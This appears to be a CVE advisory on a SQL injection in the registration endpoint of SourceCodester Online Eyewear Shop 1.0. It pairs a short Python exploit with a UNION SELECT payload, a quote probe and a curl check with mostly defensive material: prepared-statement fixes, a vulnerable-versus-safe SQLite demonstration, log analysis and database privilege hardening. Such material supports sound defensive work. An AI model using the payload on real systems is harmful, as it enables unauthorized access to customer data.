SourceCodester Online Eyewear Shop 1.0, SQL Injection, CVE-2025-2846 (Critical)


How CVE-2025-2846 Works

The vulnerability is in the registration component (/oews/classes/Users.php?f=registration) of SourceCodester Online Eyewear Shop 1.0. The application does not sanitize the user-supplied `ID` parameter during registration, so an attacker can inject SQL into the query built from it. The root cause is improper input validation when registration requests are processed. The SQL injection enables unauthorized database access, potentially exposing sensitive customer data or admin credentials, or allowing remote code execution. The attack is exploitable remotely without authentication (PR:N in CVSS 4.0). The vulnerability scores 6.9 (MEDIUM) in CVSS-B but is marked critical due to its potential impact.

DailyCVE Form

Platform: SourceCodester Online Eyewear Shop
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Says:

Exploitation:

import requests
target = "http://target.com/oews/classes/Users.php?f=registration"
payload = {"ID":"1' UNION SELECT 1,2,3,4,5,6,7,8,9,database()-- -"}
r = requests.post(target, data=payload)
print(r.text)

Detection:

-- Query that results when the ID parameter is set to 1' ; the unterminated string raises a syntax error if the input reaches the query unescaped
SELECT * FROM users WHERE id = '1'';

Mitigation:

// Secure Users.php with prepared statements (mysqli); the "..." stand for the remaining columns
$stmt = $conn->prepare("INSERT INTO users (id, ...) VALUES (?, ...)");
$stmt->bind_param("s", $_POST['ID']);  // bound as a string value, never concatenated into the query text
$stmt->execute();
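To make the mitigation concrete, here is an added example (not code from SourceCodester or from this advisory) that writes the registration INSERT both ways against an in-memory SQLite database: once by string concatenation, the pattern behind CVE-2025-2846, and once with placeholders, the prepared-statement fix shown above. The table name `users` and the `id` column mirror the advisory; the other columns, the helper names and the sample values are assumptions. The single-quote probe used in the Detection section errors out against the concatenated version and is stored harmlessly by the parameterized one.

```python
# Added example (not code from SourceCodester or the advisory): the same
# registration INSERT written two ways, run against an in-memory SQLite
# database so the difference can be demonstrated offline. The table name
# "users" and column "id" mirror the advisory; the other columns are assumed.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id TEXT PRIMARY KEY, firstname TEXT, email TEXT)"
    )
    return conn


def register_vulnerable(conn, user_id: str, firstname: str, email: str) -> None:
    # Pattern behind CVE-2025-2846: untrusted input concatenated into the SQL text.
    sql = (
        "INSERT INTO users (id, firstname, email) VALUES ('"
        + user_id + "', '" + firstname + "', '" + email + "')"
    )
    conn.execute(sql)
    conn.commit()


def register_safe(conn, user_id: str, firstname: str, email: str) -> None:
    # Mitigation: placeholders; the driver passes values separately from the query text.
    conn.execute(
        "INSERT INTO users (id, firstname, email) VALUES (?, ?, ?)",
        (user_id, firstname, email),
    )
    conn.commit()


def probe(handler, user_id: str) -> str:
    """Run the single-quote probe from the Detection section against a handler
    and report whether the database raised an error or stored the value."""
    conn = make_db()
    try:
        handler(conn, user_id, "Alice", "alice@example.invalid")  # constructed sample values
    except sqlite3.Error as exc:
        return f"sql error: {exc}"
    row = conn.execute("SELECT id FROM users").fetchone()
    return f"stored: {row[0]}"


if __name__ == "__main__":
    print("vulnerable handler, probe 1' ->", probe(register_vulnerable, "1'"))
    print("safe handler, probe 1'       ->", probe(register_safe, "1'"))
    print("safe handler, normal id      ->", probe(register_safe, "42"))
```

The point to take from the run: the probe value is identical in both cases, and only the way it reaches the database changes. A quote that breaks the concatenated query is just another character in a bound parameter, which is why the fix is parameterization rather than filtering individual characters.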

WAF Rules:

location ~ /oews/classes/Users.php {
    deny all;  # temporary fix: blocks the registration endpoint (legitimate sign-ups included) until the patch is applied
}

Log Analysis:

# POST bodies are not written to the access log, so the ID value itself is not visible; match registration POSTs and review volume and status codes per client
grep -E 'POST /oews/classes/Users\.php\?f=registration' /var/log/apache2/access.log
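The grep above only lists matching lines; deciding which clients deserve a look still has to be done by hand. The following added example (not part of the advisory) parses Apache combined-format access log lines, counts registration POSTs per client address and flags clients that hammer the endpoint or trigger server errors. Because the access log does not record POST bodies, the injected `ID` value is never visible there; request volume and 5xx responses are the signal this script works from. The log lines are constructed for the example and use documentation-range addresses; the threshold and function names are assumptions.

```python
# Added example (not part of the advisory): find registration POSTs in Apache
# combined-format access log lines and flag clients that hammer the endpoint
# or provoke server errors. POST bodies are not logged, so the ID value is not
# visible; volume and 5xx responses are the signal.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
REGISTRATION = "/oews/classes/Users.php?f=registration"

# Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [14/May/2025:10:00:01 +0000] "POST /oews/classes/Users.php?f=registration HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [14/May/2025:10:00:02 +0000] "POST /oews/classes/Users.php?f=registration HTTP/1.1" 500 198 "-" "python-requests/2.31"
203.0.113.7 - - [14/May/2025:10:00:02 +0000] "POST /oews/classes/Users.php?f=registration HTTP/1.1" 500 198 "-" "python-requests/2.31"
198.51.100.20 - - [14/May/2025:10:05:44 +0000] "POST /oews/classes/Users.php?f=registration HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [14/May/2025:10:05:45 +0000] "GET /oews/ HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""


def parse(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def registration_stats(log_text: str) -> dict:
    """Per client IP: number of registration POSTs and how many returned 5xx."""
    stats = defaultdict(lambda: {"posts": 0, "errors": 0})
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == REGISTRATION:
            stats[rec["ip"]]["posts"] += 1
            if rec["status"] >= 500:
                stats[rec["ip"]]["errors"] += 1
    return dict(stats)


def suspicious_clients(log_text: str, max_posts: int = 2) -> list:
    """Clients exceeding max_posts registration POSTs or causing any server error."""
    stats = registration_stats(log_text)
    return sorted(
        ip for ip, s in stats.items() if s["posts"] > max_posts or s["errors"] > 0
    )


if __name__ == "__main__":
    for ip, s in registration_stats(SAMPLE_LOG).items():
        print(f"{ip}: {s['posts']} registration POSTs, {s['errors']} server errors")
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

A burst of registration POSTs from one address that ends in HTTP 500 responses is exactly what the single-quote probe from the Detection section looks like from the server side; the same per-client view also catches the blind enumeration that follows once an injection point has been confirmed.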

Database Cleanup:

REVOKE ALL PRIVILEGES ON eyewear_db.* FROM 'webuser'@'%';  -- MySQL requires a table specifier (db.*) here
GRANT SELECT, INSERT, UPDATE ON eyewear_db.* TO 'webuser'@'%';  -- re-grant only what the shop needs (least privilege)

Patch Verification:

# After patching this should print nothing: a stray quote in ID must no longer surface a database error
curl -s -X POST "http://localhost/oews/classes/Users.php?f=registration" -d "ID=1'" | grep -qi "error" && echo "Vulnerable"

Exploit Impact:

  • Data exfiltration
  • Authentication bypass
  • RCE via database functions

Protection Checklist:

1. Update to patched version

2. Implement parameterized queries

3. Restrict database permissions

4. Enable WAF filtering

5. Monitor suspicious registration attempts

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
